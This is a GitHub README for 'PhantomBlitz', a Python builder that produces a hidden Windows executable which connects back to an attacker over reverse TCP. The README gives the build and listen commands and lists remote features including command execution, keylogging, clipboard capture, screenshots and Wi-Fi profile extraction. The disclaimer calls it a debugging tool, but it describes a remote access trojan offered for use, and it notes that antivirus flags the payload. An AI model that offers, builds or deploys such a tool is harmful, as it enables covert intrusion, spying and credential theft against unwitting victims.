Skip to content

Latest commit

 

History

History
61 lines (53 loc) · 2.64 KB

README.md

File metadata and controls

61 lines (53 loc) · 2.64 KB

PhantomBlitz

image

PhantomBlitz is a Python-based framework that creates an executable file with various parameters. It allows users to perform a reverse TCP connection and execute cmd commands.

DISCLAIMER:

This tool is intended for legal and ethical use only. The creator of this tool is not responsible for any illegal or unethical use of this tool.

IMPORTANT:PLEASE USE WINDOWS FOR PAYLOAD FILE GENERATION ⚠ DETECTABLE BY AV AND WINDOWS VIRUS-TOTAL-SCREENSHOT

Features

  • Reverse TCP connection
  • Execute cmd commands
  • Collect OS info
  • Set clipboard text
  • Get clipboard text
  • Take screenshot
  • Start file server
  • Analyze LAN traffic
  • Type text
  • Download URL
  • Open link
  • Generate WLAN profile
  • Keylogger

Requirements

Same platform as the client python3 -m pip install -r requirements.txt

Usage

PhantomBlazer can be executed with the following parameters:

    --mode/-m: Mode: accepts > build or listen
    --lhost/-lh: The local host IP address
    --lport/-lp: The local port number
    --output/-o: The output file name

Example: python3 phantomblazer.py -m build --lh <ip.address> --lp <port> --output<application.name>.exe Before payload execution on client: python3 phantomblazer.py -m listen --lh <ip.address> -lp <port>

Inbuilt ommands can be executed using the following syntax:

    collect-os-info
    set clipboard <text>
    get clipboard
    take screenshot
    start file server
    analyze lan traffic
    type <text>
    download <url>
    open link <link>
    generate wlan profile *
    generate wlan profile <name>
    start keylogging

To view captured use start file server for remote file service , the server will be on the client's address

The tool creates a .exe file which runs as a background and creates a reverse TCP connection, allowing for remote command execution. This tool is intended for debugging purposes and should not be used to gain unauthorized access to systems.

Please use this tool at your own risk and with the appropriate permissions from the system owners. Any actions taken with this tool are the sole responsibility of the user.

By using this tool, you agree to the terms and conditions outlined above and acknowledge that any misuse of this tool is strictly prohibited.